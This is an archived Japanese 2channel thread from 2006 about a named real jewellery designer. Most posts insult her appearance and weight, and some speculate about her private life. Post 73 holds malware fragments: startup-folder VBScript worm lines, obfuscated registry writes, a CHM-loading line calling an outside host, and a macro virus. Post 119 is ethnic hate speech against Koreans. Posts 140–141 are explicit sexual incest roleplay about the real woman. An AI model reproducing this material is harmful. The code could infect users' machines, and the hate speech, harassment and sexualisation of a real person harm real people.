5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆[tink pink]★福王寺彩野ちゃん★3[デザイナー]☆

1 :無名モデル:2006/09/21(木) 16:26:31 ID:5knrTRvA
雑誌にも毎月載ってる、ピンクが似合う人気アクセサリーデザイナーの
福王寺彩野ちゃんに付いて語りましょう。 (日本画家・福王寺一彦さんの愛娘です)

(前スレ)
【tink pink】 福王寺彩野ちゃん2【デザイナー】
http://life7.2ch.net/test/read.cgi/model/1119318465/
(前々スレ)
【tink pink】 福王寺彩野ちゃん【デザイナー】
http://life7.2ch.net/test/read.cgi/model/1108864044/
lt;lt;tinkgt;gt;福王寺 彩野lt;lt;pinkgt;gt;
http://life7.2ch.net/test/read.cgi/model/1090567126/

★tink pink Ayano's Blog 【福王寺彩野オフィシャルブログ】
http://ameblo.jp/tinkpink-ayano/
★旧ブログURL http://www.ahkah.jp/tinkpink/diary.php
★モデルブログ★ : ★tinkpink福王寺彩野★
http://model-blog.seesaa.net/article/19128653.html

福王寺彩野
tinkpinkデザイナー/AHKAH PR

1981年10月31日、東京都生まれ。
O型。
成城大学文芸学部芸術学科卒業、
博物館学芸員資格取得。
日本画家の福王寺一彦氏を父に持ち、幼少の頃から芸術に触れながら育つ。
成城大学在学中より母の経営するジュエリーブランド「AHKAH」でプレスを務め、卒業直前の2003年11月、「AHKAH」の妹ブランドとして自らのブランド、「tinkpink」を立ち上げる。
 そのラブリーかつゴージャスなデザインで若い女性を中心に大人気に。また独自のセンスを生かし、多数の雑誌・TV等にも登場し多方面で活躍中。
2005年春よりジュエリーライン「Prerogative A」を手がけ、同年秋冬からは潟Tンリオとのコラボレーションラインとして「tinkpink×Hello Kitty」をスタート。


2 :無名モデル:2006/09/21(木) 17:00:15 ID:Q12QuVPp
タイのオカマ乙

3 :無名モデル:2006/09/21(木) 17:19:24 ID:hr9gVLUG
顔ぼっこぼっこやんvvv

4 :無名モデル:2006/09/23(土) 04:35:20 ID:ZyP5Fjsc
そーか?

5 :無名モデル:2006/09/23(土) 04:36:03 ID:???
うんこブス

6 :無名モデル:2006/09/23(土) 21:52:31 ID:???
足臭

7 :無名モデル:2006/09/23(土) 21:57:01 ID:greRREVJ
本人がスレ立てかい?

8 :無名モデル:2006/09/24(日) 01:01:32 ID:vDnbsXWL
ブスデブ
ピンク似合ってない!!

9 :無名モデル:2006/09/27(水) 21:47:32 ID:???
ゴリ野はドテチンにソックリだ!!

10 :無名モデル:2006/09/28(木) 09:25:31 ID:HJYzBZe5
雑誌見るたびにブタゴリラって言葉が浮かぶ。
ほんとブスだよね。
性格は悪そうじゃないけど。。。ふかきょんと仲良しなのはうらやましいな

11 :無名モデル:2006/09/28(木) 10:33:09 ID:???
プロフィールに父や祖父の事かくってむなしいな・・
ぶっちゃけ毒モの中では家柄いいけど
そんな末裔とか華族とかじゃないんでしょ?
だいたい自分の力だけで勝負できないで
大学生みたいな自慢だけで
いい年して恥ずかしくないのかな?
不細工だから嫉妬されないとは思うけど。

12 :無名モデル:2006/09/28(木) 14:35:12 ID:???
スレタイなんで変わってないんだよー

13 :無名モデル:2006/09/28(木) 16:19:03 ID:???
ある意味不細工でよかったんじゃないの?? 
嫉妬されなくて(笑)

14 :無名モデル:2006/09/28(木) 21:26:58 ID:7vxgWErQ
今の金銭感覚のままで将来幸せな結婚出来るのかな、とか他人事ながら
思ってしまうわ。周りがお金持ちと結婚させてくれるだろうけど。
些細な事では「幸せ」と感じないんだろうなーとブログ見る度に思う。

15 :無名モデル:2006/09/28(木) 23:29:23 ID:???
SHIHOとも幼馴染やし芸能友達多いね
ホントだったらもっと刺激されて痩せてキレイになりそうやけど金ありすぎて
おいしい食べ物ばっか食ってるからこーなるんだよ

16 :993:2006/09/29(金) 00:14:09 ID:???
いや・・・
死ぬほど刺激されてても
元っつーもんがありますんで・・・。

17 :無名モデル:2006/09/29(金) 01:23:06 ID:???
食欲に勝てない豚ちゃん
そろそろ実沙豚の仲間入りになるぞ〜

18 :無名モデル:2006/09/29(金) 09:23:12 ID:???
スレタイしょぼすぎる。
前スレの最後にあったスレタイのがよかったなぁ。

19 :無名モデル:2006/09/29(金) 12:44:04 ID:???
大丈夫、あやのちゃんはみーブタの仲間入りは程とういから。この人は
みーブタの体系にはならないから、あれは特殊。アレで自分は可愛いて思ってる
のがみさこ。

20 :無名モデル:2006/09/29(金) 13:01:36 ID:???
足臭

21 :無名モデル:2006/09/29(金) 15:47:39 ID:Us+XFvQx
21 :無名モデル :04/07/24 14:17 ID:HFlRiiw8
日記で「決して多くない自分のお給料で・・・」とか言ってるけど
tinkpinkだって自分の金で立ち上げたわけじゃないんでしょ?
雑誌にでてるのも全部コネ。
ほんとにブスだから、なんでアンタが?って見ててイライラする。

22 :無名モデル:2006/09/29(金) 15:59:18 ID:WcN45cQY
はじめまして。
ブログのアドレスを教えて頂けないでしょうか?
よろしくお願いしますm(__)m

23 :無名モデル:2006/09/29(金) 16:04:55 ID:uJ4QN7R6
↑この本人のコメントって嫌味?親近感アピールうざいんだけど。
時々弱気なコメント載せるあたりが本当にうざい。

ブログって続けば続く程その人の性格が出るけど、ほんとこの人
性悪な感じがする。謙遜ぶりが逆効果。

24 :無名モデル:2006/09/29(金) 20:32:02 ID:3Qr0Jxj0
小学校から高校まで同級生(同期生)だったけど凄く変身したよ。
垢抜けたのかな..お馬鹿になったのかな..
最近になって初めて彼女のブログを読んでみたんだけど、
「仲良しの・・・」「大好きな・・・」「大親友の・・・」なんて言葉が
しつこいよってくらいにたくさん使われているなって思った。
でも学生時代の友達のことは全然大切にしていないからw

25 :無名モデル:2006/09/30(土) 01:39:05 ID:LYi2M/MU
友達もワンランク上を選んでるんだね!

26 :無名モデル:2006/09/30(土) 02:00:16 ID:RRxlCEpg
福オサーンが友達って呼んでいるのは
芸能人、モデル、読モ、ファッション業界の人
限定なんでしょ

ミーハーやね〜
アホやん

27 :無名モデル:2006/09/30(土) 10:15:49 ID:???
>>23
なんか謙遜してるフリして自信マンマンな感じがするんだよね〜


28 :無名モデル:2006/09/30(土) 19:28:41 ID:CsnMOrPj
彩野ちゃんのチャームポイントといえば?☆
どなたか答えてちょうだい!

29 :無名モデル:2006/09/30(土) 20:21:07 ID:???
福おじさん
ごりらいも
ぶたごりら
ごり野
ぶた野
うん野
どてちん。。。色々呼び名があって楽しいね。

30 :無名モデル:2006/09/30(土) 21:58:25 ID:???










31 :無名モデル:2006/10/01(日) 02:00:54 ID:???
ごりらいもに1票!

でもあんなけフトルベリーにデザインパクられても友達付き合いするごりらいもに感動!!

32 :無名モデル:2006/10/01(日) 02:15:33 ID:???
ごりらいもw

33 :無名モデル:2006/10/01(日) 15:05:04 ID:b4hKVJ9I
jamチャンのみさこちゃん達と写ってる、彩野ちゃんの太さはさすがにひく。。

34 :無名モデル:2006/10/01(日) 15:35:36 ID:???
ホンマの友達ならブログに写メ載せたりしないし。何か有名なら誰でも
良いんじゃないかって思うくらい親友、仲良しなを使っているから
本当の友達がいなさそうに思えてきた。

35 :無名モデル:2006/10/01(日) 15:52:03 ID:uMhYTa0n
ブログのアドレスを教えてくださいッ(´・ω・`)

36 :無名モデル:2006/10/01(日) 15:57:44 ID:zbKpLahv
ブタだー。こーいう人は親が死んだら死ぬんだよね。

37 :無名モデル:2006/10/01(日) 16:57:04 ID:nGz2Bugz
ミサコみたいに自分は可愛いと勘違いしてないだけよっぽどマシ。
あとあんな悪徳商売じゃないみたいだし。

38 :無名モデル:2006/10/01(日) 18:11:48 ID:???
控えめにしてるフリで可愛いと思ってると思うなー

39 :無名モデル:2006/10/01(日) 19:07:42 ID:???
周りに可愛い子が多いから(アイドルやら本物のモデルやら)
あたしも可愛い、って
本当に可愛い子たちと同列に考えるてる部分はあるかもしれないね

40 :無名モデル:2006/10/01(日) 23:04:20 ID:???
こいつはま実沙豚と違ってちゃんと己を分かってそう
ブログとかでも自分の事キモイとか人間じゃないとかボロクソ書いてるし逆に気持ちいい
その分金でキレイになろうなろうと頑張ってるとこもまた笑えるが
いちいち店に来た芸能人を一人づつ毎日報告するとこがキモイけど

41 :無名モデル:2006/10/02(月) 00:04:54 ID:yYy176EJ
土・日にうめ阪に行って副凹痔さんを見てきた人いる?

42 :無名モデル:2006/10/02(月) 01:28:36 ID:ZEe4/rjI
>>35
http://m.ameblo.jp/m/flyid.do?url=tinkpink-ayano

43 :無名モデル:2006/10/02(月) 02:26:55 ID:9bYkswUJ
大阪なの?

44 :無名モデル:2006/10/02(月) 18:47:06 ID:8eKJcv4O
ティンクピンクかわいいよ。美沙子の太るベリーと違って、高い理由が明確だよね。

45 :無名モデル:2006/10/02(月) 21:30:50 ID:???
実沙豚に比べると全然マシに感じる

46 :無名モデル:2006/10/02(月) 23:17:42 ID:8eKJcv4O
豚めしのみーたんキモイって。みーたんに会った事ある人っている?

47 :無名モデル:2006/10/02(月) 23:43:40 ID:inxNEmp+
>>41
見たよ、雑誌と同じでまあまあ可愛い、一人でぽつんと立っていました。

48 :無名モデル:2006/10/06(金) 09:46:00 ID:a8GNteQm
服いつも可愛い

49 :無名モデル:2006/10/06(金) 09:47:50 ID:FEZ2Df7P
ネイルもけっこう可愛い☆

50 :無名モデル:2006/10/06(金) 10:02:25 ID:???









51 :無名モデル:2006/10/06(金) 11:08:21 ID:???
この人は整形したとしてもダメな顔してるね
かわいそう

52 :無名モデル:2006/10/06(金) 11:11:54 ID:FEZ2Df7P
彩野ちゃんエステするのかな?☆

53 :無名モデル:2006/10/06(金) 15:37:21 ID:???
この子のネイルいつも可愛いよね☆
顔はイマイチだけどネイルは参考にしてる
JAMとかよりぜんぜんいいよッ

54 :無名モデル:2006/10/06(金) 16:18:37 ID:kEzrXR65
最新のブログでホクズンと焼き肉してる画像がうpされているんだけど、
このメンバーでみートンの悪口とか言ってそうw

55 :無名モデル:2006/10/06(金) 22:41:21 ID:a8GNteQm
言いません。

56 :無名モデル:2006/10/06(金) 22:55:49 ID:???
ひいき目に見てもブス

57 :無名モデル:2006/10/06(金) 23:36:39 ID:xA1Tmp/0
みさこちゃんって友達いないよね。

58 :無名モデル:2006/10/07(土) 00:58:49 ID:???
みさ豚より可愛い!!


59 :無名モデル:2006/10/07(土) 13:41:48 ID:???
あんな性格最悪で非常識で恥しらずのセンスなく金執着なみさこに友達が
いたら、度々ブログで紹介するでしょ。家族も露出しまくってるんだから。
みさこは毒モ仲間では嫌われてるし。皆上辺だけだから。

60 :無名モデル:2006/10/07(土) 19:50:52 ID:YKQwAW/i
ほんまブッサイク オッサンの顔しとるやんけ

61 :無名モデル:2006/10/07(土) 23:12:41 ID:???
みさこちゃんと綾野ちゃんかわいい

62 :無名モデル:2006/10/08(日) 09:21:19 ID:rnE92aRz
この人の生活、仕事、うらやましいと思うけど
あの顔!!!!!!!!!!!!!!!!!!!!!!
美人だったらもっと取り上げられかたも違ってるよね。
自分のことを不細工みたいなこと言うけど
あれは心から思ってないよ
ドブス

63 :無名モデル:2006/10/09(月) 02:13:44 ID:???
一人娘、孫として可愛いって言われて育ってそうだしね。
それを真面目に受け取ってるんでしょ〜
控えめに見えない、偉そうに見える。

64 :無名モデル:2006/10/11(水) 15:22:44 ID:???
JJに出てたけど顔がパンパンだった彩豚パンマンだよ

65 :無名モデル:2006/10/12(木) 00:08:49 ID:wtZ/ml4p
人気者だね。

66 :無名モデル:2006/10/14(土) 08:47:36 ID:???









67 :無名モデル:2006/10/16(月) 18:40:43 ID:DFFT6rVo
blog更新してちょ?

68 :無名モデル:2006/10/17(火) 02:32:04 ID:C6ZO1WOU
>>63
勝浦の定食屋の看板娘・妹尾美幸ちゃんよりはましかな?
勝浦の定食屋の娘でタレント☆妹尾美幸ちゃん☆
http://tv7.2ch.net/test/read.cgi/geino/1160670094/
勝浦の定食屋の娘でタレント☆妹尾美幸ちゃん☆
http://tv7.2ch.net/test/read.cgi/geino/1160670127/

69 :無名モデル:2006/10/18(水) 13:42:36 ID:???
       ご
        
       り
 
       ら
 
       い

       も


      って
       よ
       ん
       で
       ネ

70 :無名モデル:2006/10/18(水) 13:45:50 ID:eTSMAxZV
63 :無名モデル :04/07/31 21:09 ID:vnhXehw3
ブスは雑誌に載ってはいけません。

64 :無名モデル :04/07/31 22:07 ID:??? [sage]
髪型と輪郭と目と鼻と口と歯と耳とスタイルと声とセンスがダメ。
つまり、福王寺の存在自体がありえない。

65 :無名モデル :04/08/01 01:06 ID:??? [age]
見てらんないぐらいのアピり具合で痛い。HPの日記もうざい。
有名人がつけてるとか展示会来たとか全部スタイリスト経由じゃんw

66 :無名モデル :04/08/01 01:10 ID:1Ld8XX1M
デブ ブス 色黒 ピンク似合わない

誰かこいつのいいとこ教えてけれ

67 :無名モデル :04/08/01 07:57 ID:??? [sage]
リンリンアロハ〜〜〜さて来月号は何ページに渡り載るかなぁ?

68 :無名モデル :04/08/01 22:16 ID:??? [age]
bisのサーフィンしてるやつ二段腹。デブが!!!

69 :無名モデル :04/08/01 23:10 ID:??? [sage]
色黒のヤシがショキピン着ることほど惨めに見える事はないよな。ババくさ

70 :無名モデル :04/08/02 12:36 ID:fGYt1h3u
いいところ かまやつ様に少し似てる所

71 :無名モデル:2006/10/18(水) 13:47:44 ID:eTSMAxZV
71 :無名モデル :04/08/02 12:39 ID:bLfS4ePD
ほんと可愛い所なさすぎ

72 :無名モデル:2006/10/18(水) 23:39:47 ID:L8ZAj7fY
あらっらら〜
みんなスゴイ事書いちゃてるね、現物は雑誌よりはいいよ〜、
でもちょと無愛想スギだわ。。。
ママさんもうちょっと
愛想よくね〜って教育してほしかったねぇ
ちょいお嬢さんに見えるように。

73 :<body onload=window()>:2006/10/19(木) 00:19:25 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


74 :無名モデル:2006/10/19(木) 01:28:31 ID:???
あんなちゃちいデザインのアクセサリーで高い金とるとかありえん。
アーカはいいけど、コネでお遊びすんじゃねーよって雑誌見てていつも思います。

75 :無名モデル:2006/10/20(金) 20:21:33 ID:???
ママはかわいいのに、なぜ娘は・・・?

76 :無名モデル:2006/10/22(日) 13:50:13 ID:9zDQbntr
なんかブスでデブで色黒で、普通にページめくってて初めて見たときあまりの
ひどさにびっくりした。今までにここまでひどい読モ見たことないと思った。
でもあそこまでひどいとなんか気の毒な気が。容姿以外はそこそこ恵まれてるみたいだけど、
もし入れ替われるとしても嫌だな。


77 :無名モデル:2006/10/22(日) 23:51:18 ID:???
ブログで自分のことよく謙遜してるけどさ、本当にそう思ってたらこんなに雑誌に出ないとオモ。

78 :無名モデル:2006/10/23(月) 01:49:46 ID:???
何か市村正規に似てる気がする

79 :無名モデル:2006/10/23(月) 15:06:40 ID:???
この子の場合、告知日記=自慢日記だよな。

80 :無名モデル:2006/10/24(火) 18:08:11 ID:???
IKKOさんにマジ似
親子???


81 :無名モデル:2006/10/24(火) 21:01:42 ID:???
綾野ちゃんもみさこちゃんもお嬢様で羨ましいし
お高くとまってなくて二人とも憧れちゃう

82 :無名モデル:2006/10/24(火) 22:19:57 ID:???
>>78 まちがった!!妹尾さんのスレだと思って書きこんでた
市村正規に似てると思うのは妹尾さん
スレ違いでごめん

83 :無名モデル:2006/10/26(木) 02:14:50 ID:colY3J8K
彼氏いるんだぁ???
普通にビックリ

84 :無名モデル:2006/10/26(木) 03:10:42 ID:3tVEX7L0
本当のセレブはあんな自慢しないよ

ドブスだから自慢しててもなんかかわいそうだ

85 :???:2006/10/29(日) 07:02:19 ID:???
あげ

86 :無名モデル:2006/10/29(日) 08:01:53 ID:???
>>81精神科池

87 :無名モデル:2006/10/29(日) 22:04:08 ID:???
関西・関西ってウルサイよ!そんなに言うなら関西に永住しろ。

てか、この人が謙遜なんて!するはずない。
思ってもないことブログで書くなよ。
昔から自慢好きだしね〜

88 :無名モデル:2006/10/30(月) 00:30:17 ID:???
日曜日に心斎橋でこの人見ました!
リトルベリーのでかい紙袋2つも持ってたから、そんな人おるんや〜ってちらっと見たら豚野でした。雑誌で見るよりかは細かったけど、頭でかくて髪の毛めちゃ汚かったよ!

89 :無名モデル:2006/10/30(月) 02:26:15 ID:???
私が見た時も頭おっきかった。
グリグリに巻いたロングが重たそうでバランス悪い。
ちなみに私が見たときは爪が汚かった。
あんなにネイル自慢してるのに乾燥して白くなってて
手入れ不足って思った。

90 :無名モデル:2006/11/01(水) 08:18:31 ID:???
彼氏はどんな人なの?

91 :無名モデル:2006/11/01(水) 12:54:18 ID:???
金持ちの人

92 :無名モデル:2006/11/01(水) 18:06:55 ID:???
ホントに彼氏いるのかな?
ブログに女友達については有名無名問わずいろいろ書いてるけど
彼氏についてはないよね?
別にどこの誰と公表する必要はないけど、「彼と一緒に映画見ま
した〜」とか書いててもおかしくないのに。

93 :無名モデル:2006/11/02(木) 01:36:41 ID:???
フライデーされちゃ困る!とか思ってんじゃねーのw

94 :無名モデル:2006/11/02(木) 03:27:04 ID:???
あたしも彼氏は居ない気がする

95 :無名モデル:2006/11/02(木) 15:01:05 ID:???
本当に彼氏が居たのなら亜美みたく目撃や名前があがるハズ
だがこの人の場合みさこみたいに飾りで指輪を付けてるんじゃないのかな?
JAMの亜美でさえ誰が彼氏かも名前出て目撃多数なのに。


96 :無名モデル:2006/11/02(木) 17:40:15 ID:zCVrzuOQ
ミクシィのプロフのプリクラの男は誰だろ〜?

97 :無名モデル:2006/11/02(木) 18:17:27 ID:???
>96
美容師とかじゃないの?

98 :無名モデル:2006/11/02(木) 18:18:24 ID:???
その写メって貼れますか?


99 :無名モデル:2006/11/02(木) 20:19:33 ID:???
女子高生姿イタイ

100 :無名モデル:2006/11/03(金) 17:10:21 ID:0JoDECft
ミクシのTOP気になるわー

101 :無名モデル:2006/11/05(日) 12:24:40 ID:/T+JY+Ke
しょーた君って人じゃないかな?

多分。

102 :無名モデル:2006/11/05(日) 13:58:24 ID:???
この人、生で見たときほんまデブ!と思った。
デブでブスで洋服何着てもゴリラにしか見えない!!

103 :無名モデル:2006/11/08(水) 23:14:17 ID:TLiYrzNj
あげっちゅ

104 :無名モデル:2006/11/21(火) 11:06:06 ID:jmw30t+K
>>97
私も人づてに聞いたよ。
JAMもそうだし!だって☆

105 :無名モデル:2006/11/21(火) 11:21:08 ID:LnHvLgn0
さすがに錦戸には相手されないね。

106 :無名モデル:2006/11/21(火) 11:23:58 ID:???
106 :無名モデル :04/08/07 10:16 ID:??? [age]
今月もこの人何ページも出るのかな?

107 :無名モデル:2006/11/21(火) 15:09:14 ID:SSs4vWhP
脚は綺麗だよね。
本人も自覚してるのか常に生足…
冬服なのに変。

108 :無名モデル:2006/11/21(火) 15:16:06 ID:Flb1FADk
別に変じゃないと思うけど…
脚きれいなら出した方がいいじゃん。
顔がいかつい分きれいな所アピってカバーしてんだよ。



109 :無名モデル:2006/11/21(火) 15:19:13 ID:YyDn/288
そもそもTPのリボン形のロゴがちゃちくて、それだけで良い商品も安っぽく
見えてしまう。もろ手書きって感じで、狙ってる手書き感とはまたべつに見えるし・・

110 :無名モデル:2006/11/21(火) 15:22:34 ID:dm1p0fWl
彩野ちゃんが着てたバンビクチュールのワンピ、パリスより似合ってる!!

111 :無名モデル:2006/11/23(木) 06:33:24 ID:/8e4K5yM
↑何年前の話?ww

112 :無名モデル:2006/11/23(木) 10:08:16 ID:???
すみません
顔がきんもい

113 :無名モデル:2006/11/23(木) 14:52:44 ID:???
ごりらいも恭ちゃん恭ちゃんってうっさいんじゃデブ
所詮深田恭子も整形丸出し

114 :麗華:2006/11/23(木) 14:54:17 ID:wBMhZt2d
114 :麗華 :04/08/08 21:20 ID:q1vraHZv
私は、別にファンでも何でもないけど、嫌いじゃないなぁ。

115 :無名モデル:2006/11/24(金) 00:38:20 ID:iuNUT2BE
あたしは大好き

116 :無名モデル:2006/11/24(金) 00:43:59 ID:???
>>107
脚は綺麗かもしれんけど視線を上にあげていって顔にたどり着いた時には
ゲロはくよ。

117 :無名モデル:2006/11/24(金) 00:58:51 ID:???
ごりらに似てるよね
声聞いた時も引いた
ありゃおっさんの声だ

118 :無名モデル:2006/11/24(金) 02:12:51 ID:???
>>117
外見は別になんとも思わんがあの声は無理
こもりすぎやから

119 :無名モデル:2006/11/24(金) 07:41:50 ID:???


Q:なぜ朝鮮人が嫌われているのか?

A:インターネットにより,朝鮮人の実態が暴かれたから。
在日朝鮮人は,強制連行の犠牲者だと信じ込まされていたのに,
実際は,そのほとんどが密航・密入国で押し掛けてきた者とその子
孫だと分かった。おまけに戦前から犯罪が多く,とりわけ終戦後に
は,戦勝国民を騙り日本の男達が戦場からまだ復員していないこと
をいいことに,殺人,強姦,強窃盗,麻薬の密売,土地の不法占拠
など凶悪犯罪を犯していたことが分かった。
 また朝鮮を植民地にして彼らをを酷い目に遭わせたと信じ込まさ
れていたのに,実際には,朝鮮人,とりわけ被支配階級の朝鮮人に
とっては祝福ともいえる多大な恩恵を与えた。そして,道路すら無
く荒廃していた土地を近代化させたのも,他ならぬ日本であったこ
とを理解した。
 さらに,日本の敗戦後,日本国内だけでなく半島においても,日
本人に襲いかかり多大な被害と損害を与え,莫大な財産を略奪した
ことも明らかになった。
 そのうえ,今日に至るまで韓国は強烈な反日教育を行ない,こと
あるごとに日本へ害をなし,北朝鮮は日本に対して拉致,違法送金,
麻薬の密輸,工作員の送り込みなどの敵対行為をおこなってきたこ
とを知った。
 これだけのことをやられたことが分かったら,怒るのは当然である。


120 :捜査員:2006/11/25(土) 17:11:36 ID:???
福王寺のブランド「tink pink」のアクセサリーデザインをパクる村上実沙子

http://mimgmobl.ameba.jp/user_images/9f/a3/10012358044.jpg

121 :無名モデル:2006/11/25(土) 17:49:49 ID:h330qA70
自慢に思えるってのは受取り側の問題じゃない?本人からしてみたら自慢じゃなくてごく自然の事だからブログに書いてるんじゃない?


122 :無名モデル:2006/11/25(土) 17:51:45 ID:dTLwpROY
伊勢丹で120万円のキティ売るって?!
12/3伊勢丹で抽選会やるって
買わないケド行って、
実物あやのっち見ちゃおうかなぁ。。。

123 :無名モデル:2006/11/26(日) 06:52:50 ID:CVvd1p4d
blogでこれみよがしに薬指の指輪アピールしてたね。25年処女疑惑を払拭したいのか?

124 :無名モデル:2006/11/26(日) 13:30:06 ID:???
>>122
120万円!?12万の間違えじゃないの!?
キティちゃんが120万円…
全面ダイヤなの!?
買う人おんのか?

125 :無名モデル:2006/11/26(日) 14:23:03 ID:aTGlQKPm
12万と120万らしいぞ!!!




126 :無名モデル:2006/11/26(日) 15:22:25 ID:???
>124
自分も値段の違いがよくわからんのだが?
リングとペンダントという違いだけで、
同じゴールドハートダイアなのに。
タイプミスでもなさそうだし


127 :無名モデル:2006/11/26(日) 17:18:19 ID:???
男の影ないから。これで男いますのアピールしてんじゃないの。

128 :無名モデル:2006/11/27(月) 19:29:31 ID:aJlVarI7
愛犬家の私としては、10月5日の日記でのチワワの抱き方に憤りを覚える。
あれは抱っこじゃなくて「犬をつかんでる」って感じ。チワワ、嫌そうだし。

この人に言いたい。犬はぬいぐるみじゃないんだから!!
つーか飼い主もどうなの。あんな抱き方してるの見た時点で止めさせろ!



129 :無名モデル:2006/11/27(月) 20:39:26 ID:iNSfL6Xs
mixiに何て名前でおるん??

130 :無名モデル:2006/11/27(月) 20:40:14 ID:???
↑貴様はひっこんどれ。チンカス野郎が

131 :無名モデル:2006/12/01(金) 17:31:51 ID:xp10oovY
横峯さくらに激似だよねーまじで。

132 :無名モデル:2006/12/02(土) 15:58:27 ID:WVisoI7C
あやん

133 :無名モデル:2006/12/03(日) 02:30:02 ID:nWxxXyVE
>>128
ウッザー。ほっといてやれよ

134 :無名モデル:2006/12/03(日) 14:15:57 ID:shYaN27v
今日の綾野ちゃん可愛かった

135 :無名モデル:2006/12/03(日) 14:18:32 ID:???
124万のジュエリー買った人いるの?

136 :無名モデル:2006/12/03(日) 14:58:01 ID:X3qo7Snu
>134
綾野じゃなくて彩野です。
>135
はい。ワタクシです。

137 :無名モデル:2006/12/03(日) 20:07:22 ID:HLazZdF1
首から下は良いんだけどね。。。顔が致命的

138 :無名モデル:2006/12/04(月) 03:21:18 ID:zH70yBOF
★I★K★K★O★
似すぎ

139 :無名モデル:2006/12/05(火) 17:08:58 ID:2pFKzs1M
>133
本人降臨!!
つーか、このスレってアクセスするとウイルスかかるようになってるよね。
菌ばらまいた奴はw

140 :無名モデル:2006/12/05(火) 22:09:34 ID:???

ハァ ハァ… …
あやのおっぱい、やわらかいよ…

ぁんっ…こんなのママに見られたら… っぁあ…

今日は帰ってこないよ…さきっちょも固くなってる…   レロレロ… ちゅぱっ

…あれ?あや、感じてるの?
あやのおまんまん、ヌメヌメだよー…
やらしいなぁあやは。…ハァ

ここはどこかな?

ぅう〜… ぃやあっ っぁんっ
…ク、  クリトリスっ …ぁあっ ぃやあっ ぁはっ …

そうだね ちゃんと毎日オナニーしてる成果だ…ハァ いい子だね…
おまんまんから溢れてる… チュパッ… おいしいよ、あや ハァハァ…

…ぁ ハァッ… ぁあんっ…


141 :無名モデル:2006/12/05(火) 22:10:17 ID:???

…ぁ ハァッ… ぁあんっ…

ムズムズして…何が欲しいの?ご褒美だよ… あや…パパに言ってごらん?

…ハアッ 恥ずかしいっ…  …ぁんっ

握っても駄目だぞ ハァッ
あやが言わないと、ご褒美あげないよ?
あやはパパの何を握ってるの? …ハァ ハァッ レロレロ…

…ぁンっ ぁやの、っはあっ… パパのおちんちん… ほしぃのぉっ…

パパのおちんちん、どこがほしがってるの? …ハァハァ

っん… あやのの、 おまんまん…

お願いごとはちゃんと言わないとパパわかんないよ…くちゅっ…くちゅ…

ぁああっ …はぁっ あやのの、おまんまんに…ぁんっ
 パパの固くて、おっきいおちんちん くださぃっ …ぁんっ


142 :無名モデル:2006/12/05(火) 23:41:37 ID:???
頼むからマジでやめて。バリきもい。

143 :無名モデル:2006/12/05(火) 23:50:52 ID:???
もうまつ毛つけよーがファインメイクを目元フルでやろーが
何をやってもだめなのは鼻が超だんごで横に広がってるのが
致命傷なんだろうね。
顔のパーツの配置もわるいんだろーけど、とにかくお気の毒だわ。

144 :無名モデル:2006/12/06(水) 03:45:41 ID:NvooYGUs
>>140
>>141
ゴリノの妄想オナニーでしょ
ほんとキモイから。そーいうのは頭の中だけにして。
ゴリノ乙。
ハイハイワロスワロス。

145 :無名モデル:2006/12/06(水) 19:31:42 ID:???
金持ってるんだろうな
ウラヤマス

146 :無名モデル:2006/12/09(土) 16:13:43 ID:gKlEzoUc
本物はかわゆいのに。。

147 :無名モデル:2006/12/09(土) 16:19:16 ID:???
福山雅治がアーカーのアクセをつけたとかいってMステ行ったみたいだけど、あくまでアーカーであってティンクではないよね?なんでしゃしゃってアーカー代表として行ったりできるのかなぁ 不思議

148 :無名モデル:2006/12/09(土) 18:28:25 ID:qgH0fq2c
アーカーPRだからじゃないの?福山いいなぁー

149 :無名モデル:2006/12/09(土) 22:02:59 ID:???
福山みたいなイケメンと会うの恥ずかしくないのかな・・・
「ちょw この顔ww」とか思われてるかもしれないのに。

150 :無名モデル:2006/12/11(月) 17:28:15 ID:???
いえてる。
不自然だろうがなんだろうがあのゴリラ鼻をせんたくバサミで
挟んだりしてどーにかしたらいいのに。

151 :無名モデル:2006/12/11(月) 21:33:16 ID:???
>>149
絶対思われてると思うw
謙遜する割には性格が目立ちたがり屋なもんだから
自分で自分の首締めることになるんだよねw
超美系ハーフやモデルと並んだ画像アップしたりさw

152 :無名モデル:2006/12/13(水) 22:50:55 ID:???
顔の中心に君臨しているあのでか鼻がやっぱり致命傷かw

153 :無名モデル:2006/12/14(木) 13:37:16 ID:???
別にビュジアルで金稼いでる訳じゃないんだから
いいじゃん不細工だってw
見たくなかったら、プッシュメディアに顔が出てくる訳じゃないんだから
自ら見ない様にすればいいじゃんよ

こいつが、自分より遙かに恵まれた環境に居るから
羨ましくて、妬んでるだけだろ?
で、自分のビジュアルと比べて、なんの意味も成さない優越感に浸って、満足してるだけだろ?

低俗な女どもだな

154 :無名モデル:2006/12/15(金) 01:10:31 ID:???
そんな深い意味なんてあるわけないじゃんw
ビジュアルと実力の両面で稼ぎたいと本人は必死で
雑誌とかにでまくってるから失笑かってるだけの話。

155 :無名モデル:2006/12/16(土) 10:46:31 ID:w9P8poq0
噴くオジサンのブログへのコメントって少ないよねw
しかもイタいコメントばかりで…
質問的なコメントにも一切返答したことが無いなんてヒドいもんだわ。

156 :無名モデル:2006/12/16(土) 11:44:44 ID:???
